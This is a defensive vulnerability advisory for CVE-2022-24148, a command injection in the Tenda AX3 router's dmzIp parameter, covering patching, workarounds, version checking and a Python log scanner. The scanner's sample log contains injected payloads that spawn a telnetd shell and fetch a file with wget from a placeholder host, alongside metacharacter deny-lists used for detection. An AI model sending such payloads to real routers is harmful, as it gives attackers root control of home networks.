CVE-2022-24148
📋 TL;DR
CVE-2022-24148 is a critical command injection vulnerability in Tenda AX3 routers. The dmzIp parameter handled by the mDMZSetCfg function is passed into a system command without validation, so an attacker who can reach the web management interface can execute arbitrary commands on the device. The commands run with the privileges of the router's web server process, which on consumer routers of this kind is typically root, so a successful exploit gives full control of the device. It affects Tenda AX3 routers running vulnerable firmware (see Affected Systems and How to Verify below). No authentication is required, and exploitation is remote: from the LAN by default, or from the Internet if remote management is enabled or the interface is otherwise exposed.
💻 Affected Systems
- Tenda AX3
📦 What is this software?
The Tenda AX3 is a consumer Wi-Fi 6 (AX3000) home router. Its web management interface (the /goform/* endpoints referenced below) exposes the DMZ configuration handler in which the vulnerable function lives.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the router allowing attackers to install persistent backdoors, intercept all network traffic, pivot to internal network devices, and use the router as part of a botnet.
Likely Case
Router takeover leading to DNS hijacking, credential theft from network traffic, and installation of malware on connected devices.
If Mitigated
Limited impact if the management interface is reachable only from a trusted administrative network (never from the WAN), the DMZ feature is disabled so the vulnerable handler is not used, and the router is not relied on as the only security boundary for the internal network.
🎯 Exploit Status
Proof-of-concept code is publicly available on GitHub. The vulnerability requires no authentication and has simple exploitation vectors.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Later versions than v16.03.12.10_CN
Vendor Advisory: Not publicly documented by Tenda
Restart Required: Yes
Instructions:
1. Log into the router admin interface.
2. Navigate to the firmware update section.
3. Download the latest firmware for the AX3 from the Tenda website.
4. Upload and install the firmware update.
5. Reboot the router after installation.
🔧 Temporary Workarounds
Disable DMZ functionality
Disable the DMZ feature, whose configuration handler contains the vulnerable function. This reduces exposure but does not remove the code, so it is not a substitute for patching.
Restrict management interface access
Make sure remote (WAN-side) management is turned off, and use an upstream firewall or VLAN rules to allow access to the router's management interface only from trusted administrative IP addresses.
🧯 If You Can't Patch
- Replace affected router with a different model or vendor
- Isolate router in separate VLAN with strict firewall rules preventing access to management interface
🔍 How to Verify
Check if Vulnerable:
Check the router firmware version in the admin interface. v16.03.12.10_CN is the version reported as vulnerable. Older builds have not been confirmed either way, so treat any version at or below v16.03.12.10_CN as vulnerable until Tenda states otherwise.
Check Version:
Check via the router web interface at 192.168.0.1 or 192.168.1.1 (the system status or firmware page). The page also mentions 'curl http://router-ip/goform/getStatus'; whether that endpoint exists and reports the version on this model is not confirmed here, so use the web interface as the authoritative source.
Verify Fix Applied:
Verify firmware version has been updated to a version higher than v16.03.12.10_CN
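Firmware versions such as v16.03.12.10_CN must be compared numerically, not as strings: a naive string comparison ranks v16.03.12.9 above v16.03.12.10. The following is an added example (not Tenda's code or tooling) that parses a version string of this form and applies the check described above; the choice to treat older builds as vulnerable is a conservative assumption, because no fixed-in version has been published.

```python
import re

# The version this advisory reports as vulnerable.
VULNERABLE_VERSION = "v16.03.12.10_CN"


def parse_version(text):
    """Split a Tenda-style version string such as 'V16.03.12.10_CN' into
    (numeric tuple, region suffix). A leading 'v'/'V' and surrounding
    whitespace are ignored; the suffix (e.g. CN) is returned separately
    because it does not take part in ordering."""
    m = re.fullmatch(r"\s*[vV]?(\d+(?:\.\d+)*)(?:_([A-Za-z]+))?\s*", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    numbers = tuple(int(part) for part in m.group(1).split("."))
    return numbers, (m.group(2) or "").upper()


def is_vulnerable(version):
    """True when the firmware is the advisory's vulnerable version or older.
    Assumption: older builds are treated as vulnerable, since the vendor has
    not published a fixed-in version; a newer version is treated as fixed."""
    numbers, _ = parse_version(version)
    known_bad, _ = parse_version(VULNERABLE_VERSION)
    return numbers <= known_bad


if __name__ == "__main__":
    # Constructed sample inputs, as they might be read off the status page.
    for v in ["V16.03.12.10_CN", "v16.03.12.9_CN", "V16.03.12.11_CN", "V16.03.13.1"]:
        print(f"{v:18} vulnerable={is_vulnerable(v)}")
```

Paste the version string exactly as the admin interface shows it; the parser tolerates the capital V and the region suffix that Tenda appends.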
📡 Detection & Monitoring
Log Indicators (consumer routers rarely expose request logs, so these usually come from an upstream reverse proxy, IDS, or packet capture in front of the management interface, or from a shell on the device if you have one):
- Unusual POST requests to /goform/setDMZ or /goform/mDMZSetCfg, especially from addresses that do not normally administer the router
- Shell metacharacters (such as ; | ` $ & and newlines) in the dmzIp parameter, or a dmzIp value that is not a plain IPv4 address
- Unexpected processes (telnetd, wget, busybox sh) spawned by the router's web server process
Network Indicators:
- Unusual outbound connections from router
- DNS queries to suspicious domains
- Unexpected SSH/Telnet connections originating from router
SIEM Query (pseudo-syntax; adapt the source and field names to how your proxy or IDS logs the request path and body):
source="router_logs" AND (uri="/goform/setDMZ" OR uri="/goform/mDMZSetCfg") AND (dmzIp CONTAINS "|" OR dmzIp CONTAINS ";" OR dmzIp CONTAINS "`" OR dmzIp CONTAINS "$")
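The SIEM query above is a deny-list of metacharacters, which an attacker can sometimes sidestep with encodings or characters it does not name. A stronger check for this parameter is an allow-list: dmzIp is only ever supposed to be an IPv4 address, so anything that does not parse as one is suspicious. The following is an added example (not part of the original advisory) that runs both checks over a few constructed request-log lines in an assumed "METHOD PATH BODY" format; the log format, the sample lines and the hostile payloads in them are all made up for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Constructed sample log lines (not real router logs). Assumed format:
# one request per line as "METHOD PATH [urlencoded-body]".
SAMPLE_LOG = """\
POST /goform/setDMZ dmzIp=192.168.0.50&dmzEn=1
POST /goform/setDMZ dmzIp=192.168.0.50%3Btelnetd%20-l%20%2Fbin%2Fsh&dmzEn=1
POST /goform/mDMZSetCfg dmzIp=%60wget%20http%3A%2F%2F203.0.113.9%2Fx%60
GET /goform/getStatus
POST /goform/setDMZ dmzIp=10.0.0.300&dmzEn=1
"""

# The DMZ endpoints named in this advisory.
DMZ_PATHS = {"/goform/setDMZ", "/goform/mDMZSetCfg"}

# Deny-list of characters that let a value break out of a shell command.
SHELL_META = re.compile(r"[;|`$&\n\r<>(){}]")


def parse_line(line):
    """Split 'METHOD PATH BODY' into its three parts (body may be empty)."""
    parts = line.split(" ", 2)
    method, path = parts[0], parts[1]
    body = parts[2] if len(parts) > 2 else ""
    return method, path, body


def check_dmz_request(line):
    """Return a finding describing why the request looks like an attack,
    or None when it is benign. parse_qs URL-decodes the body, so encoded
    metacharacters (%3B, %60, %7C) are caught as well as literal ones."""
    _method, path, body = parse_line(line)
    if path not in DMZ_PATHS:
        return None
    params = parse_qs(body, keep_blank_values=True)
    for value in params.get("dmzIp", []):
        # Deny-list check: mirrors the SIEM query above.
        if SHELL_META.search(value):
            return f"shell metacharacters in dmzIp: {value!r}"
        # Allow-list check: the only legitimate value is an IPv4 address.
        try:
            ipaddress.IPv4Address(value)
        except ValueError:
            return f"dmzIp is not an IPv4 address: {value!r}"
    return None


def scan_log(text):
    """Return [(line_number, finding), ...] for every suspicious request."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        finding = check_dmz_request(line)
        if finding:
            findings.append((number, finding))
    return findings


if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```

Of the five sample lines, the two with injected commands and the one with a malformed address are flagged; the benign DMZ update and the unrelated status request are not. The allow-list check is what catches the last case, which the metacharacter query alone would miss.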